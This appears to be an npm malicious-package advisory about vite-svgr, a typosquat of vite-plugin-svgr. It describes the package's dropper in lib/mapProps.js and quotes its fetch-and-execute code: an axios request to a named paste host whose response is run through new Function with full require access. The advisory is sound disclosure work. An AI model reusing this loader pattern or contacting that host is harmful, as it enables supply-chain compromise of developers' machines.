npm · Malicious package advisory
Malwarevite-svgr
MAL-2026-5708
Malicious code in vite-svgr (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5)
Package name `vite-svgr` impersonates the popular `vite-plugin-svgr`, but the shipped code is a fork of `tsconfig-paths` (package.json description: 'Load node modules according to tsconfig paths') with an added remote-code-execution dropper at lib/mapProps.js. The dropper performs `axios.get('https://www.jsonkeeper.com/b/EQUBH', { headers: { 'x-secret-key': '_' } })` and then runs the response body's `Cookie` field via `new Function('require', s)(require)` — arbitrary JavaScript with full Node `require` access executed under the installer's user. The code is reachable from the package's `main` via the exported `configJson(...)`, which spawns `node lib/mapProps.js` detached, so any consumer that imports this package and calls `configJson` triggers fetch-and-execute against an anonymous, mutable paste host. The combination of name impersonation, fork of an unrelated library, and remote-payload-execution is the canonical supply-chain attack shape.
Compromised versions (2)
- 1.1.3
- 1.1.2
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.